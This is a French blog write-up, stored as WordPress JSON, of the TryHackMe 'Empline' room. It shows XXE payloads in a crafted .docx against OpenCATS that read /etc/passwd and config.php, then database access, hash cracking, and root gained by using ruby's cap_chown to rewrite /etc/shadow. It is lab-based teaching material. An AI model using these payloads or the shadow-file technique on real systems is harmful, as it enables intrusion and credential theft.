{"id":2176,"date":"2021-09-20T11:57:56","date_gmt":"2021-09-20T09:57:56","guid":{"rendered":"https:\/\/mikadmin.fr\/blog\/?p=2176"},"modified":"2021-09-20T11:59:47","modified_gmt":"2021-09-20T09:59:47","slug":"tryhackme-empline","status":"publish","type":"post","link":"https:\/\/mikadmin.fr\/blog\/tryhackme-empline\/","title":{"rendered":"[TryHackme] \u2013 Empline"},"content":{"rendered":"<\/span> 4<\/span> min read<\/span><\/span>

Views: 1931<\/p>\n

<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n

Lien :<\/strong> https:\/\/tryhackme.com\/room\/empline<\/a><\/p>\n\n\n\n

Auteur :<\/strong> https:\/\/tryhackme.com\/p\/zyeinn<\/a><\/p>\n\n\n\n

Difficult\u00e9 :<\/strong> Moyenne<\/span><\/p>\n\n\n\n

\n\n\n\n
<\/div>\n\n\n\n

[USER]<\/h1>\n\n\n\n
<\/div>\n\n\n\n

L’\u00e9num\u00e9ration de la machine \u00e0 l’aide de nmap nous permet de d\u00e9couvrir 3 ports ouverts qui sont le 22<\/strong>, 80<\/strong> et 3306<\/strong>.<\/p>\n\n\n\n

# nmap -A -T4 10.10.181.246\n\n22\/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 c0:d5:41:ee:a4:d0:83:0c:97:0d:75:cc:7b:10:7f:76 (RSA)\n|   256 83:82:f9:69:19:7d:0d:5c:53:65:d5:54:f6:45:db:74 (ECDSA)\n|_  256 4f:91:3e:8b:69:69:09:70:0e:82:26:28:5c:84:71:c9 (ED25519)\n80\/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: Empline\n3306\/tcp open  mysql   MySQL 5.5.5-10.1.48-MariaDB-0ubuntu0.18.04.1\n| mysql-info: \n|   Protocol: 10\n|   Version: 5.5.5-10.1.48-MariaDB-0ubuntu0.18.04.1\n|   Thread ID: 85\n|   Capabilities flags: 63487\n<\/code><\/pre>\n\n\n\n
\n\n\n\n
Une fois sur le site web nous pouvons voir que l’onglet EMPLOYMENT<\/strong> nous redirige vers http:\/\/job.empline.thm\/careers<\/a> :<\/p>\n\n\n\n
\"TryHackMe\"<\/figure><\/div>\n\n\n\n
<\/p>\n\n\n\n
<\/div>\n\n\n\n
Nous pouvons en d\u00e9duire qu’il faut ajouter empline.thm<\/strong> et job.empline.thm<\/strong> \u00e0 notre fichier \/etc\/hosts<\/strong> :<\/p>\n\n\n\n
echo "10.10.181.246 empline.thm job.empline.thm" >> \/etc\/hosts<\/code><\/pre>\n\n\n\n
<\/div>\n\n\n\n
Ce qui nous permet d’avoir acc\u00e8s \u00e0 cette page :<\/p>\n\n\n\n
\"TryHackMe\"<\/figure><\/div>\n\n\n\n
\n\n\n\n
<\/div>\n\n\n\n
Voici un article tr\u00e8s tr\u00e8s int\u00e9ressant qui pr\u00e9sente l’exploitation d’une faille XXE<\/span><\/strong> (CVE-2019-13358<\/strong><\/em>) sur le m\u00eame CMS<\/strong> :<\/p>\n\n\n\n
https:\/\/doddsecurity.com\/312\/xml-external-entity-injection-xxe-in-opencats-applicant-tracking-system\/<\/a><\/p>\n\n\n\n
\n\n\n\n
<\/div>\n\n\n\n
La cr\u00e9ation d’un document malicieux <\/strong>va nous permettre de pouvoir lire un fichier sur le serveur<\/strong>, ici nous allons reproduire les m\u00eames actions que dans l’article mentionn\u00e9 plus haut :<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/div>\n\n\n\n
Cr\u00e9ation du script permettant de g\u00e9n\u00e9rer un fichier .docx<\/strong> :<\/p>\n\n\n\n
#!\/usr\/bin\/env python3\n\nfrom docx import Document\n\ndocument = Document()\nparagraph = document.add_paragraph('Reginald Dodd')\ndocument.save('resume.docx')<\/code><\/pre>\n\n\n\n
(root\ud83d\udc80kali)# chmod +x script.py\n(root\ud83d\udc80kali)# .\/script.py\n(root\ud83d\udc80kali)# unzip resume.docx<\/code><\/pre>\n\n\n\n
<\/div>\n\n\n\n
Nous devons \u00e0 pr\u00e9sent modifier le fichier document.xml pour y inclure la XXE<\/strong> :<\/p>\n\n\n\n
nano word\/document.xml<\/code><\/pre>\n\n\n\n
# Payload for read \/etc\/passwd\n<!DOCTYPE test [<!ENTITY test SYSTEM 'file:\/\/\/etc\/passwd'>]>\n\n# Change Reginald Dodd to &test;<\/code><\/pre>\n\n\n\n
<\/div>\n\n\n\n
Copier ce payload \u00e0 la ligne 2 et changer Reginald Dodd par &test;<\/strong> ce qui nous donne :<\/p>\n\n\n\n
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>\n<!DOCTYPE test [<!ENTITY test SYSTEM 'file:\/\/\/etc\/passwd'>]>\n<w:document xmlns:wpc="http:\/\/schemas.microsoft.com\/office\/word\/2010\/wordprocessingCanvas" xmlns:mo="http:\/\/schemas.microsoft.com\/office\/mac\/office\/2008\/main" xmlns:mc="http:\/\/schemas.openxmlformats.org\/markup-compatibility\/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships" xmlns:m="http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http:\/\/schemas.microsoft.com\/office\/word\/2010\/wordprocessingDrawing" xmlns:wp="http:\/\/schemas.openxmlformats.org\/drawingml\/2006\/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http:\/\/schemas.openxmlformats.org\/wordprocessingml\/2006\/main" xmlns:w14="http:\/\/schemas.microsoft.com\/office\/word\/2010\/wordml" xmlns:wpg="http:\/\/schemas.microsoft.com\/office\/word\/2010\/wordprocessingGroup" xmlns:wpi="http:\/\/schemas.microsoft.com\/office\/word\/2010\/wordprocessingInk" xmlns:wne="http:\/\/schemas.microsoft.com\/office\/word\/2006\/wordml" xmlns:wps="http:\/\/schemas.microsoft.com\/office\/word\/2010\/wordprocessingShape" mc:Ignorable="w14 wp14"><w:body><w:p><w:r><w:t>&test;<\/w:t><\/w:r><\/w:p><w:sectPr w:rsidR="00FC693F" w:rsidRPr="0006063C" w:rsidSect="00034616"><w:pgSz w:w="12240" w:h="15840"\/><w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="720" w:footer="720" w:gutter="0"\/><w:cols w:space="720"\/><w:docGrid w:linePitch="360"\/><\/w:sectPr><\/w:body><\/w:document><\/code><\/pre>\n\n\n\n
<\/div>\n\n\n\n
Il nous suffit \u00e0 pr\u00e9sent de re zip tout \u00e7a et de l’upload sur le site !<\/p>\n\n\n\n
zip resume.docx word\/document.xml<\/code><\/pre>\n\n\n\n
\n\n\n\n
<\/div>\n\n\n\n
Nous pouvons postuler \u00e0 cette offre de dev mobile ici m\u00eame : <\/p>\n\n\n\n
http:\/\/job.empline.thm\/careers\/index.php?m=careers&p=applyToJob&ID=1<\/a><\/p>\n\n\n\n
\"TryHackMe\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
Apr\u00e8s upload de notre fichier .docx <\/strong>nous avons comme retour le contenu du fichier \/etc\/passwd<\/strong> :<\/p>\n\n\n\n
\"TryHackMe\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
\n\n\n\n
Cependant ceci ne nous permet pas d’avancer dans l’exploitation de cette machine, ce qui peut-\u00eatre int\u00e9ressant est de lire le contenu du fichier config.php<\/strong> contenant les informations de connexion \u00e0 la base de donn\u00e9es qui elle est ouverte \u00e0 la connexion sur le port 3306<\/strong>.<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/div>\n\n\n\n
Le principe est exactement le m\u00eame sauf que nous allons utiliser ce payload :<\/p>\n\n\n\n
<!DOCTYPE test [<!ENTITY test SYSTEM 'php:\/\/filter\/convert.base64-encode\/resource=config.php'>]><\/code><\/pre>\n\n\n\n
Ce qui nous donne :<\/p>\n\n\n\n
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>\n<!DOCTYPE test [<!ENTITY test SYSTEM 'php:\/\/filter\/convert.base64-encode\/resource=config.php'>]>\n<w:document xmlns:wpc="http:\/\/schemas.microsoft.com\/office\/word\/2010\/wordprocessingCanvas" xmlns:mo="http:\/\/schemas.microsoft.com\/office\/mac\/office\/2008\/main" xmlns:mc="http:\/\/schemas.openxmlformats.org\/markup-compatibility\/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships" xmlns:m="http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http:\/\/schemas.microsoft.com\/office\/word\/2010\/wordprocessingDrawing" xmlns:wp="http:\/\/schemas.openxmlformats.org\/drawingml\/2006\/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http:\/\/schemas.openxmlformats.org\/wordprocessingml\/2006\/main" xmlns:w14="http:\/\/schemas.microsoft.com\/office\/word\/2010\/wordml" xmlns:wpg="http:\/\/schemas.microsoft.com\/office\/word\/2010\/wordprocessingGroup" xmlns:wpi="http:\/\/schemas.microsoft.com\/office\/word\/2010\/wordprocessingInk" xmlns:wne="http:\/\/schemas.microsoft.com\/office\/word\/2006\/wordml" xmlns:wps="http:\/\/schemas.microsoft.com\/office\/word\/2010\/wordprocessingShape" mc:Ignorable="w14 wp14"><w:body><w:p><w:r><w:t>&test;<\/w:t><\/w:r><\/w:p><w:sectPr w:rsidR="00FC693F" w:rsidRPr="0006063C" w:rsidSect="00034616"><w:pgSz w:w="12240" w:h="15840"\/><w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="720" w:footer="720" w:gutter="0"\/><w:cols w:space="720"\/><w:docGrid w:linePitch="360"\/><\/w:sectPr><\/w:body><\/w:document><\/code><\/pre>\n\n\n\n
<\/div>\n\n\n\n
 \u26a0\ufe0f N’oublions pas de re zip<\/strong> le document et let’s go pour l’upload :<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/p>\n\n\n\n
Nous obtenons donc du base64<\/strong> qui est en r\u00e9alit\u00e9 le contenu du fichier config.php<\/strong> :<\/p>\n\n\n\n
<\/p>\n\n\n\n
<?php\n[REDACTED]\n\n\/* Database configuration. *\/\ndefine('DATABASE_USER', 'james');\ndefine('DATABASE_PASS', '[REDACTED]');\ndefine('DATABASE_HOST', 'localhost');\ndefine('DATABASE_NAME', 'opencats');\n\n[REDACTED]\n?><\/code><\/pre>\n\n\n\n
\n\n\n\n
<\/div>\n\n\n\n
Nous pouvons d\u00e8s \u00e0 pr\u00e9sent nous connecter sur la base de donn\u00e9es afin de l’\u00e9num\u00e9rer :<\/p>\n\n\n\n
mysql -h 10.10.181.246 -u james -p<\/code><\/pre>\n\n\n\n
show databases;\nuse opencats;\nselect * from user;<\/code><\/pre>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
Nous trouvons donc deux passwords mais le plus int\u00e9ressant est celui de george<\/strong> car nous savons d\u00e9j\u00e0 qu’il est pr\u00e9sent sur la machine, il suffit simplement de cracker ce md5 avec crackstation<\/a> :<\/p>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
C’est l’heure d’utiliser ce password en ssh :<\/p>\n\n\n\n
\"TryHackMe\"<\/figure><\/div>\n\n\n\n
\n\n\n\n
<\/p>\n\n\n\n
[ROOT]<\/h1>\n\n\n\n
<\/div>\n\n\n\n
Apr\u00e8s \u00e9num\u00e9ration classique, nous pouvons d\u00e9couvrir qu’il y a une capability<\/a> sur le binaire ruby<\/strong><\/span> :<\/p>\n\n\n\n
getcap -r \/ 2>\/dev\/null<\/code><\/pre>\n\n\n\n
\"TryHackMe\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
Le mtr-packet<\/strong> n’est pas int\u00e9ressant, ici nous avons le cap_chown<\/span><\/strong> d’activ\u00e9, ce dernier permet de changer le propri\u00e9taire d’une fichier\/dossier.<\/p>\n\n\n\n
\n\n\n\n
Il est plus courant de voir ceci avec du python<\/a> mais apr\u00e8s recherche on peut s’aider de ce lien :<\/p>\n\n\n\n
https:\/\/ruby-doc.org\/core-2.5.0\/File.html<\/a><\/p>\n\n\n\n
File.chown(nil, 100, "testfile")<\/code><\/pre>\n\n\n\n
\n\n\n\n
Ce qui nous donne dans notre cas par exemple :<\/p>\n\n\n\n
<\/div>\n\n\n\n
# Change the owner of \/etc\/shadow (where 1002 = george uid)\n(root\ud83d\udc80kali)# ruby -e "File.chown(1002, 1002, '\/etc\/shadow')"\n\n# Set 777 perms to this file\n(root\ud83d\udc80kali)# chmod 777 \/etc\/shadow\n\n# Create a new password for root user where mika = password\n(root\ud83d\udc80kali)# openssl passwd mika\n\nWe got zvceb9H\/tHBKQ\n\n# Let's modify the root user in \/etc\/shadow\n\nroot:$6$1cvOcl49$\/czKHKvBaz450J3YnIvkqexT.StvdgUWzPr5X1Aitt\/kxgF\/i78wziX3zJQ0y8Kg9y749Qjr5EFiHmTdPsIJH\/:18828:0:99999:7:::\nto\nroot:zvceb9H\/tHBKQ:18828:0:99999:7:::\n\n# Connect to root with mika as password and grab your flag\n\ngeorge@empline:~$ su root\nroot@empline:\/home\/george# id\nuid=0(root) gid=0(root) groups=0(root)\n<\/code><\/pre>\n\n\n\n
<\/div>\n","protected":false},"excerpt":{"rendered":"
<\/span>  4<\/span> min read<\/span><\/span>Are you good enough to apply for this job ? Continuer la lecture →<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":45,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_themeisle_gutenberg_block_has_review":false,"footnotes":""},"categories":[4],"tags":[21,73,9,45,71,22,60,63,72],"class_list":["post-2176","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-infosec","tag-ctf","tag-cve-2019-13358","tag-linux","tag-pentest","tag-ruby","tag-tryhackme","tag-web","tag-writeup","tag-xxe"],"aioseo_notices":[],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts\/2176","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/comments?post=2176"}],"version-history":[{"count":0,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts\/2176\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/media\/45"}],"wp:attachment":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/media?parent=2176"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/categories?post=2176"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/tags?post=2176"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}